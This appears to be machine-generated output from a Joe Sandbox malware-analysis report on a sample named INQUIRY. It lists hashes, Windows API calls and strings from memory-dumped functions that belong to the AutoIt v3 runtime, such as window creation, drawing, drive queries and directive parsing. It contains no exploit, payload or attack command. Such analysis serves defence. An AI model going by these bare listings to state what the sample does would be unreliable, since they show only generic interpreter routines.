                                                                                              • Instruction ID: 8a0fdc1ce79b12bb69bcf76334b6dc07c99b816608be1ae84789d506ecc5bbb0
                                                                                              • Opcode Fuzzy Hash: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
                                                                                              • Instruction Fuzzy Hash: 0EA0123000010CEB8A001B91EC044457F5CD6001907004021F40C840218B3254514580
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
                                                                                              • Instruction ID: 20fa22ffaa7f621146d1d9eeb6920dd57074c207f2cbb710fc412191d197602d
                                                                                              • Opcode Fuzzy Hash: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
                                                                                              • Instruction Fuzzy Hash: 75222330A056268BDF288B7CE59467C77B1FB01384F2A817AF9428B592DF789DD1C641
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction ID: dad8460d902510cb5c739df2966b42db773c6968dcdb23c4a4184637546adff8
                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction Fuzzy Hash: 66C172322051930ADF2D473A847417EFAA19EA37B1B1A076DF8B3CB1D4EE24D965D720
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction ID: 4b11d399757e6f2373f44af940e4f636b68b36653a12c6504407fc00501404db
                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction Fuzzy Hash: 08C162322051930ADF6D473AC47423EFAA19EA37B1B1A176DF4B2DB1D5EE20C925D720
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction ID: 028a0a6eba535991520892db62e2cf17a4ae82862b932ddc96ac9630a245aca9
                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction Fuzzy Hash: 0AC16F322091930ADF6D473AC47413EFAA19EA37F271A176DF4B2CB1D4EE20C965D660
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction ID: 8167ab63501efd3bea03d0c63de3dc7da21a1807d10baac6110a530c774073fe
                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction Fuzzy Hash: AC41D371D1051CEBCF48CFADC991AEEBBF2AF88201F948299D516AB345D730AB41DB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction ID: 4979d43373b504232074480f09c843cdb75fe30fa9db208582a3a14743c30e5c
                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction Fuzzy Hash: 30019278A04109EFCB49DF98C5909AEF7B6FF48310F608599D859A7741D730EE41DB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction ID: 6036642839e3386f50652c454aadd8f8f839aff6cacbfef24e5982cc3484cd1e
                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction Fuzzy Hash: A201AF78A04209EFCB49DF98C5909AEF7F6FF48310F608599E809A7701E730AE41DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A8785B
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A8786D
                                                                                              • DestroyWindow.USER32 ref: 00A8787B
                                                                                              • GetDesktopWindow.USER32 ref: 00A87895
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A8789C
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A879DD
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A879ED
                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A35
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00A87A41
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A87A7B
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A9D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AB0
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87ABB
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A87AC4
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AD3
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A87ADC
                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AE3
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A87AEE
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B00
                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AA2CAC,00000000), ref: 00A87B16
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A87B26
                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A87B4C
                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A87B6B
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B8D
                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87D7A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
                                                                                              • Instruction ID: 660be0109855ee5e7ad2308fbdb2ee342c25dadc6ffdc96df62620b30e9aa464
                                                                                              • Opcode Fuzzy Hash: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
                                                                                              • Instruction Fuzzy Hash: E8024C71A00115EFDB14DFA4DD89EAE7BB9EB48310F148159F915EB2A1CB30ED42CB60
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,00A9F910), ref: 00A93627
                                                                                              • IsWindowVisible.USER32(?), ref: 00A9364B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                              • API String ID: 4105515805-45149045
                                                                                              • Opcode ID: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
                                                                                              • Instruction ID: d9f9feed8c4ae59906071bbba91c98de2218e45b1414343ee84beb91419c3c4f
                                                                                              • Opcode Fuzzy Hash: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
                                                                                              • Instruction Fuzzy Hash: 6DD14A326083019FCF04EF10C665EAF77F5AF95394F154468F8865B2A2DB21EE4ACB45
                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A9A630
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A9A661
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A9A66D
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A9A687
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A9A696
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A6C1
                                                                                              • GetSysColor.USER32(00000010), ref: 00A9A6C9
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A9A6D0
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 00A9A6DF
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A9A6E6
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00A9A731
                                                                                              • FillRect.USER32(?,?,00000000), ref: 00A9A763
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9A78E
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(00000012), ref: 00A9A903
                                                                                                • Part of subcall function 00A9A8CA: SetTextColor.GDI32(?,?), ref: 00A9A907
                                                                                                • Part of subcall function 00A9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(0000000F), ref: 00A9A928
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(00000011), ref: 00A9A945
                                                                                                • Part of subcall function 00A9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
                                                                                                • Part of subcall function 00A9A8CA: SelectObject.GDI32(?,00000000), ref: 00A9A964
                                                                                                • Part of subcall function 00A9A8CA: SetBkColor.GDI32(?,00000000), ref: 00A9A96D
                                                                                                • Part of subcall function 00A9A8CA: SelectObject.GDI32(?,?), ref: 00A9A97A
                                                                                                • Part of subcall function 00A9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
                                                                                                • Part of subcall function 00A9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
                                                                                                • Part of subcall function 00A9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
                                                                                                • Part of subcall function 00A9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 3521893082-0
                                                                                              • Opcode ID: 99826bb8041af1bc11efd2f32d17860978d9d56f5d5e63d4edfbb2f3728ef2db
                                                                                              • Instruction ID: ec2e4de2a5d5076705936db9faeb221d1b2879e0b89d751d6e4c219e0fd6fa93
                                                                                              • Opcode Fuzzy Hash: 99826bb8041af1bc11efd2f32d17860978d9d56f5d5e63d4edfbb2f3728ef2db
                                                                                              • Instruction Fuzzy Hash: 08914E72608301EFDB10DFA4DC48A5B7BE9FB48321F104B2AF962D61A0DB71D945CB92
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00A12CA2
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A12CE8
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A12CF3
                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00A12CFE
                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00A12D09
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A4C43B
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A4C474
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A4C89D
                                                                                                • Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A
                                                                                              • SendMessageW.USER32(?,00001053), ref: 00A4C8DA
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A4C8F1
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C907
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C912
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 464785882-4108050209
                                                                                              • Opcode ID: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
                                                                                              • Instruction ID: 8d4f30b4395a1dc70deba9086dd138ee69bcf41dd70cdc9fb411c2f160306235
                                                                                              • Opcode Fuzzy Hash: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
                                                                                              • Instruction Fuzzy Hash: AC129F34601201EFDB55CF24C984BA9B7E5FF84320F584569F999CB262DB31EC92CB91
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 00A874DE
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A8759D
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A875DB
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A875ED
                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A87633
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00A8763F
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A87683
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A87692
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A876A2
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A876A6
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A876B6
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A876BF
                                                                                              • DeleteDC.GDI32(00000000), ref: 00A876C8
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A876F4
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A8770B
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A87746
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A8775A
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A8776B
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A8779B
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A877A6
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A877B1
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A877BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
                                                                                              • Instruction ID: ef5230cd106d28b1d6e8e7549591a1ac059d5dedb2b3a4b59b7cdab5ab433da0
                                                                                              • Opcode Fuzzy Hash: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
                                                                                              • Instruction Fuzzy Hash: 95A14C71A40619BFEB14DBA4DD4AFAE7BB9EB08710F104215FA15E72E0DA70AD01CB64
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7AD1E
                                                                                              • GetDriveTypeW.KERNEL32(?,00A9FAC0,?,\\.\,00A9F910), ref: 00A7ADFB
                                                                                              • SetErrorMode.KERNEL32(00000000,00A9FAC0,?,\\.\,00A9F910), ref: 00A7AF59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937

APIs
• GetSysColor.USER32(00000012), ref: 00A9A903
• SetTextColor.GDI32(?,?), ref: 00A9A907
• GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
• GetSysColor.USER32(0000000F), ref: 00A9A928
• CreateSolidBrush.GDI32(?), ref: 00A9A92D
• GetSysColor.USER32(00000011), ref: 00A9A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
• SelectObject.GDI32(?,00000000), ref: 00A9A964
• SetBkColor.GDI32(?,00000000), ref: 00A9A96D
• SelectObject.GDI32(?,?), ref: 00A9A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
